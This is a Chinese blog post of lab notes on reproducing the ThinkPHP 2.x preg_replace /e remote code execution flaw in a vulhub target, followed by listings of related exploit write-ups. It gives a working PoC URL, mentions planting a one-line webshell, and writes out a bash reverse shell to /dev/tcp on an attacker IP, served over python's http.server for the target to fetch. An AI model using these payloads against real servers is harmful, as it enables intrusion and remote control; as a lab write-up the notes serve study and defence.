漏洞复现笔记(2-rce)

已于 2024-06-15 14:51:39 修改
阅读量336 收藏 7
点赞数 3
文章标签: 笔记 安全
于 2024-06-14 12:40:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72760965/article/details/139678692
版权

漏洞详情:

ThinkPHP是一个免费开源的一个PHP开发框架。ThinkPHP2.x版本中,使用preg_replace的/e模式匹配路由:

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

preg_replace(‘正则规则’,‘替换字符’,‘目标字符’)

如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时正则规则中使用了/e这个修饰符,则存在代码执行漏洞。

e配合函数preg_replace()使用,可以把匹配来的字符串当作正则表达式执行;/e可执行模式,此为PHP专有参数,例如preg_replace函数。

implode(depr,paths)作用就是把路径当作参数放进了数组$depr里面

影响版本

Thinkphp 2.x, Thinkphp 3.0版本(Lite模式)

靶场搭建

  • 使用vulhub搭建靶场
  • 搭建成功访问页面如下

漏洞复现

构造poc:

  • ?s=/index/index/name/${@phpinfo()}

成功执行phpinfo,说明漏洞存在

写入一句话木马

用蚁剑链接,成功getshell

bash shell

首先我们先创建一个shell.sh文件

  • 文件内容:bash -i >& /dev/tcp/192.168.32.145/6666 0>&1

然后开一个·HTTP的端口

  • 语法:python3 -m http.server 8888

  • 这个语法我一开始用的是:python -m SimpleHTTPServer 端口号;然后就报错:Nomodule named simplehttpserver;

  • 后面百度才知道python3已经改成了http.server,也就是:python3 -m http.server 端口号

最后我们直接抓包改,让它去下载我们的shell.sh文件

我的博客即将同步至腾讯云开发者社区,邀请大家一同入驻:https://cloud.tencent.com/developer/support-plan?invite_code=22i9x1ze7qv44

纪瑾
关注
thinkphp 2 - rce漏洞复现
Tender*的博客
08-06 437
thinkphp 2 - rce漏洞复现
漏洞复现-wordpress RCE-CVE-2024-25600
04-12 582
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
Spring Cloud Function SpEL表达式RCE漏洞复现分析
Palpitate_LL的博客
07-05 744
分析了spring-cloud-function可以发现,spring框架的几个由SpEL表达式注入造成的RCE的触发点基本上都很相似,触发类以及触发路由分析对于漏洞挖掘来说都有可以借鉴的地方。
CVE-2023-46604- RCE漏洞复现
2301_80115097的博客
11-16 3582
执行上述清理操作后过2分钟再次弹出安全告警,发现服务器再次生成configs.conf文件以及ksoftirqd/0进程,怀疑守护进程未全部清理干净,再次进行检查,发现存在多个守护进程ksoftirqd/0。虽然AMQ的61616端口依然开着,但几天未收到告警,本以为攻击者已经遗忘了我们公司,结果下午收到阿里云封禁服务器的通知,原因是服务器对外进行了DDOS攻击。由于云安全中心没有提示【拦截成功】,且该云账号的云安全中心为免费版,我们认为攻击者大概率入侵成功,必须立刻启动应急响应。
深信服EDR终端检测平台-RCE漏洞复现
thelostworld
08-18 2225
​昨晚通宵,刚刚睡醒发现群里面炸锅了-EDR终端检测平台RCE 自己也来看看。 简介: EDR简介(来自官方): 终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。 EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。 端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。深信服
BUUCTF-Real-[Jupyter]notebook-rce
分享
02-13 765
[Jupyter]notebook的简单漏洞
漏洞复现-wordpress RCE-CVE-2024-25600(1),网络安全面试项目经验
m0_60666921的博客
04-07 1085
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**④等保简介、等保规定、流程和规范。
vulfocus复现:log4j2-rce-2021-12-09
woai_zhongguo的博客
07-13 4675
log4j2远程rce漏洞复现
常见的RCE漏洞复现(CVE-2017-18349)
zkaqlaoniao的博客
11-14 248
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。再新建一个文件,使用include来引用图片马的内容。上传成功,会在下面显示临时文件储存的地址。集齐这两个文件可以召唤一个文件上传漏洞。上传完包含问价,直接访问,进行传参即可。同时在该目录也会有一个1.php文件。访问上传的文件,上传一句话木马。把咱们写的文件上传代码上传。任意位置恶意exp代码。去php.ini中修改。
Log4j2远程代码执行漏洞复现(cve-2021-44228)
热门推荐
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4j是Apache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
CVE-2020-10977-Gitlab RCE 任意文件读取导致远程命令执行漏洞-环境搭建及完整复现-exp-图文详细笔记
weixin_43311457的博客
10-29 3111
Gitlab任意文件读取导致远程命令执行 漏洞环境搭建-Centos7 1.安装依赖软件 yum -y install policycoreutils openssh-server openssh-clients postfix 2.设置postfix开机自启,并启动,postfix支持gitlab发信功能(对漏洞环境应该不重要) systemctl enable postfix && systemctl start postfix 3.下载gitlab安装包,然后安装 官方下载: CE
漏洞复现】Jupyter Notebook未授权访问到RCE
Fly_鹏程万里
06-20 209
Jupyter Notebook(此前被称为IPython notebook)是一个交互式笔记本,支持运行40多种编程语言,Jupyter Notebook的本质是一个Web应用程序,便于创建和共享程序文档,支持实时代码,数学方程,可视化和 markdown,如果管理员未为Jupyter Notebook配置密码将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。
漏洞复现-wordpress RCE-CVE-2024-25600,疯狂膜拜
m0_54903333的博客
04-11 489
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
【1day】复现GeoServer CVE-2023-25157 SQL注入
记录并分享学习安全的知识点..
07-19 841
​ GeoServer是一个开源的地图服务器,它是遵循OpenGIS Web服务器规范的J2EE实现,通过它可以方便的将地图数据发布为地图服务,实现地理空间数据在用户之间的共享。由于未对用户输入进行过滤,在使用需要以数据库作为数据存储的功能时,攻击者可以构造畸形的过滤语法,绕过GeoServer的词法解析从而造成SQL注入,获取服务器中的敏感信息,甚至可能获取数据库服务器权限。 ​
C++学习笔记----6、内存管理(五)---- 智能指针(3)
weixin_71738303的博客
09-11 1197
与指向特定类型的原始指针可以转化为不同类型的指针一样,shared_ptr保存特定的类型可以转化为一个另一种类型的shared_ptr。转化shared_ptr的函数是const_pointer_cast(),dynamic_pointer_cast(),static_pointer_cast()和reinterpret_pointer_cast()。前面简要提过,当拥有共享属主的智能指针,例如shared_ptr不在活动范围或者被重置时,只有它是最后指向的智能指针时才能释放其指向的资源。
shader 案例学习笔记之将坐标系分成4个象限
localhost
09-13 246
坐标系被分成了4个单元格,每个单元格都有唯一的索引,后续就可以根据索引去渲染。
ROS组合导航笔记1:融合传感器数据
最新发布
qq_44188415的博客
09-16 696
笔记
UEFI学习笔记(五):EDK II PCD的概念、类型、使用
qq_44189622的博客
09-11 873
如果在BIOS里面有一些模块是binary方式集成进来的而这些binary又需要用到PCD(用于Binary Release),那么这些Binary集成的要用到的PCD就必须要设置为。PCD的值存在memory里面,下次启动时,上次更改的值丢失了,每次启动都是从default值开始。是存在VPD空间的(在FLASH上,只读),一般是出厂配置。如果platform是从源码build出来的,没有binary在里面的时候,PCD用的都是。作用域在一个模块中(模块级的),可以在Binary Level进行修改。
thinkphp2-rce
07-28
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [ThinkPHP2-RCE漏洞复现]...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值